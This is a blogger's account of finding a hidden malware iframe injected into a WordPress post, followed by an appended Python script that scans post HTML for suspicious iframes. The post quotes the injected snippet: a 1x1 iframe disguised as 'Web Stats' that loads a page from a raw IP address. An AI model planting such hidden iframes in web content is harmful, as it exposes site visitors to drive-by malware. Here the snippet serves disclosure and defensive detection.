This morning at about 8 AM my fellow tiny house blogger, Kent Griswold, let me know that this site was creating a security alert in Safari. The alert said that my site contained malware. Immediately I started digging and within 20 minutes had figured it out. I’m not sure how it was done, but a little tiny bit of code was stuck into one of my posts. Here is the code. Don’t worry, it’s disabled, but I would not recommend visiting that website.
<!-- Web Stats --> <iframe src=http://18.104.22.168/stats.php?id=2 width=1 height=1 frameborder=0></iframe> <!-- End Web Stats -->
It was only partly visible in HTML view; the iframe wouldn’t render, so it looked virtually invisible. I changed my password, locked down my comments, and tightened up security. I suspect there may be a security hole in the current version of WordPress, but who knows, it could have been some plug-in I was testing too.
I’m going to spend a little time later tonight changing passwords on all my blogs and doing what I can to protect myself. If you run blogs, I suggest you try doing some searches for malware too.
Lucky for me they picked my least busy blog, this one, my personal blog. It would seriously suck if my top blogs popped up warning screens like this one to all my visitors. Fricken hacker bastages!
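One way to run the kind of search suggested above over exported post content, as an added example that is not part of the original post: it flags iframes that are 1x1 or smaller, hidden by CSS, or loaded from a raw IP address, which goes a little beyond the single snippet shown. The sample posts, the 192.0.2.10 address and all function names are constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample posts; 192.0.2.10 is a documentation-only address.
SAMPLE_POSTS = {
    "clean-post": '<p>Cabin tour</p>\n<iframe src="https://www.youtube.com/embed/VIDEO_ID" width="560" height="315"></iframe>',
    "injected-post": '<p>Hello</p>\n<!-- Web Stats --> <iframe src=http://192.0.2.10/stats.php?id=2 width=1 height=1 frameborder=0></iframe> <!-- End Web Stats -->',
}

def _tiny(value):
    """True when a width/height attribute is 0 or 1 pixel."""
    digits = (value or "").strip().rstrip("px")
    return digits.isdigit() and int(digits) <= 1

def _ip_host(src):
    """True when the URL host is an IP literal rather than a domain name."""
    try:
        ipaddress.ip_address(urlparse(src or "").hostname or "")
        return True
    except ValueError:
        return False

class IframeAuditor(HTMLParser):
    """Collects (line, src, reasons) for every suspicious iframe tag."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)  # html.parser also accepts unquoted attribute values
        reasons = []
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("1x1 or smaller")
        style = (a.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by CSS")
        if _ip_host(a.get("src")):
            reasons.append("src is a raw IP address")
        if reasons:
            self.findings.append((self.getpos()[0], a.get("src"), reasons))

def audit_post(html):
    """Return the suspicious iframes found in one post body."""
    parser = IframeAuditor()
    parser.feed(html)
    parser.close()
    return parser.findings

if __name__ == "__main__":
    for name, body in SAMPLE_POSTS.items():
        print(name, audit_post(body))
```

Feed it the post bodies from a WordPress export or database dump; a hit gives the line within the post, the iframe source and why it was flagged.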